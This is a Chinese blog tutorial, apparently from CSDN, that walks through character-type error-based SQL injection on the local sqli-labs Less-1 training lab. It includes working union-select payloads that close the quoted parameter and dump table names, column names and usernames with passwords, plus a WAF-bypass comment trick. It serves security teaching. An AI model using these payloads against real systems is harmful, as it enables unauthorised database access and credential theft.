07、注入篇--显错注入【字符型】

最新推荐文章于 2023-05-02 22:19:21 发布
最新推荐文章于 2023-05-02 22:19:21 发布
阅读量299 收藏
点赞数
分类专栏: WEB安全 文章标签: 字符型 注入 显错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/115441957
版权
本文详细解析了SQL注入原理,从用户输入控制、显错注入案例,到MySQL注释符利用、靶场实战演练。重点讲解了如何构造闭合payload,包括数字型与字符型的区别,以及各种包裹变量方法的应用。最后通过实例演示了字段探测、版本识别和数据表信息获取的过程。
摘要由CSDN通过智能技术生成

概述

注入的本质

用户输入的数据被当做代码执行

注入条件

  • 用户可以控制传参
  • 用户输入的语句被带入数据库并执行

显错注入原理

  • 用户输入的数据被当做SQL语句执行,并带入数据库执行
  • 对用户输入的数据没有做任何过滤,并且将结果返回到页面
  • 没有做任何防护

注入的关键操作

  • 构造闭合

注入基础

MySQL注释符:# 或 --空格 或  /**/
内联注释:/*!  SQL语句 */ 只有MySQL可以识别,常用来绕过WAF
注入探测符:常使用 \ 进行探测

靶场

1、靶场
在这里插入图片描述
2、根据前面的数学型注入,可先使用and 1=2 探测
在这里插入图片描述
页面无反应

3、使用探测符号\

在这里插入图片描述

4、根据报错信息

''1\' LIMIT 0,1' ==> '1\' LIMIT 0,1 (反斜杠通常为转义符)==>可猜测变量id由单引号字符围绕
构造payload: id=1' -- q (--空格 为MySQL的注释符)

5、查看后端源代码

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

添加构造的payload后:

$sql="SELECT * FROM users WHERE id='1'-- q' LIMIT 0,1";

6、将payload写入到靶场中,页面正常
靶场

7、使用oder by 探测字段数
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
8、探测字段数为3,使用联合查询,观察回显点
http://127.0.0.1/sqli/Less-1/?id=0’ union select 1,2,3 – q
在这里插入图片描述
9、探测版本号和当前数据库名
在这里插入图片描述
10、利用MySQL自带数据库information_schema得出数据

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,version(),group_concat(table_name) 
from information_schema.tables where table_schema=database() -- q

在这里插入图片描述
11、查看users数据表中的字段名

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,version(),group_concat(column_name)
 from information_schema.columns where table_schema=database() and table_name='users' -- q

在这里插入图片描述
12、查询username、password字段信息,使用limit 依次查看

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,username,password from users limit 3,1 -- q

在这里插入图片描述

总结

字符型注入与数字型注入的区别为 有无包裹变量的符号不同
以下几种包裹方式注入,与‘$id’ 注入同理

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=“$id” LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=(“$id”) LIMIT 0,1";

注入的关键在于 构造闭合

公众号小白学安全
关注
专栏目录
【合天网安】SQLi-Labs系列之字符报错注入(单引号和括号)
hehigoxqc606的博客
09-01 359
1、点击GET-Error based-Single quotes with twist – string,进入实验界面 在id值后面多加一个单引号,引发报错,根据提示信息,我们可以发现sql语句是使用了单引号和右括号闭合 2、可以在第二或第三字段中用version()函数代替,查看当前数据库的版本,得出版本为5.5.53。 http://localhost/sqli-labs-master/Less-1/?id=-1')+union+select+1,version(),3--+ .
MYSQL注入-显错注入
晨辰.的博客
05-02 1086
MYSQL数据库注入
SQL注入显错注入
秋水的博客
08-30 3702
MySQL基础知识 系统自带库information_schema中存在tables表和columns表,我们可以通过这两个表查询相关信息 distinct关键字,distinct用于去除查询中的重复,可以用information_schema.tables中的TABLE_SCHEMA字段查询出所有库信息 group_concat()函数,此函数只有MySQL中存在,作用是把查询出的内容通...
sql注入-字符报错注入
菲曼巴的博客
11-24 3294
试报错 看回显 暴字段 order by 3 union select 1,2,3 暴库 1,2,database() 暴表 group_concat(table_name) from information_schema.tables where table_schema =database() 或 group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 暴列 group_conca
SQL注入字符报错注入
studyphp123的博客
04-23 502
一、预备知识 1. SQL注入基础知识 2. SQL语句基础知识 二、实验目的 学习SQL注入字符注入。 三、实验工具 火狐浏览器(hackbar插件) 四、实验环境 1. Windows Server 2003 2. 网址www.any.com/sqli/Less-1/?id=1 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-1/?id=1 #...
SQL手工注入漏洞测试(MySQL数据库-字符
qq_45883601的博客
12-07 424
进入靶场环境,两个墨币没了。。 然后点击公告,开始手工注入。 1、首先判断是否存在注入点, http://219.153.49.228:47679/new_list.php?id=tingjigonggao%20and%201=1 页面错误,存在注入点,接着用联合查询 ...
SQL注入--其他注入方式
qq_51003021的博客
08-12 644
SQL注入的其他种类注入方式
理论8:SQL注入(字符注入和数字注入)
最新发布
aiojay的博客
05-02 3664
SQL注入(字符注入和数字注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
SQL 注入-基于联合查询的字符GET注入
xdjxi的博客
02-16 669
实验原理 字符GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类; http:/
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符)
weixin_46694260的博客
03-27 3969
0x00 前言 我们都知道,SQL注入分数字字符,我们上次讲的是最基本的数字SQL注入,这次我们就来讲最基本的字符SQL注入。同样,如果是明白原理和方法的话,看懂这文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入字符的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
06、注入--显错注入【数字
WX公众号-小白学安全
04-05 532
文章目录概述利用防范靶场 概述 利用 防范 靶场
【合天网安】SQLi-Labs系列之字符报错注入
hehigoxqc606的博客
09-01 215
SQL注入介绍: SQLi,sql injection, 我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL,Oracle以及Postgresql.Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的时,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常...
sqli-labs从零开始学习日记(二)
sky_die的专栏
05-08 1837
嗯,这次有个很好用的东西SQLMAP,主要是我看的视频里面他们用的是其他的软件
【Less-4】双引号报错字符注入 + 需要闭合“)“
ssrf
10-27 527
目录前言1、测试是否存在注入点 前言 提示:基于错误,单引号,数字注入,与前两关不同的是需要闭合括号 1、测试是否存在注入点 http://localhost/sqli-labs/Less-4?id=1' 尝试输入双引号 http://localhost/sqli-labs/Less-4?id=1" 源码 $id = '"' . $id . '"'; // 直接将输入的内容两边拼接上双引号 "1" $sql="SELECT * FROM users WHERE id=($id) LIMIT.
CTFHub SQL技能树-整数形注入-字符注入-报错注入-布尔盲注-时间盲注
Senimo
03-24 1724
整数注入 首先输入1查看回显: 可以看到返回了SQL语句及ID和Data数据,查看列数: 1 order by 2 # 当列数为2时回显正常,接着判断回显位: 1111 union select 11,22 # 可以判断出回显点位如上,查看当前数据库版本及数据库名: 1111 union select version(),database() # 查询到当前数据库名为:sqli,...
Mysql 的显错注入
weixin_59584646的博客
08-07 267
MySQL的显错注入
MySQL显错注入
weixin_53863129的博客
09-09 107
显错注入 这里拿MySQL数据库做事例,其他数据库方法类似,函数有差异而已 准备知识: 1、MySQL数据库5.0以上版本有系统自带库(information_schema),其他数据库可采用爆破或猜解来得到 2、 库名:table_schema 表名:table_name 字段名:table_column 核心:显错注入,顾名思义就是利用数据库查询语句,将数据库的内容显示出来,一般在回显页面中,网页源代码可能也存在回显 1、判断是否存在注入 http://192.16
SqliLab_Mysql_Injection详解_字符注入(三)_布尔盲注/报错注入(6)
qq_41260930的博客
10-20 779
SqlLab_Mysql_Injection详解_字符注入(四) SQL注入_布尔盲注 SQL注入_报错注入 原理 由于服务器在接受请求后,返回的页面存在报错提示的情况,可以使用一些特殊的函数在特殊的情况下,返回所想要获取的数据库信息; 常用的函数: UPDATEXML(XML_document,XPath_string,new_value)函数 第一个参数XML_document:XML_d...
什么是mysql显错注入_十种MYSQL显错注入原理讲解(一)
weixin_42505397的博客
02-05 137
我要说下,在《代码审计:企业级Web代码安全架构》这本书中讲十种MYSQL显错注入,讲的很清楚。感兴趣请去读完,若处于某种原因没读还想了解,那请继续往下。1、count,rand,floorselect * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from...
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值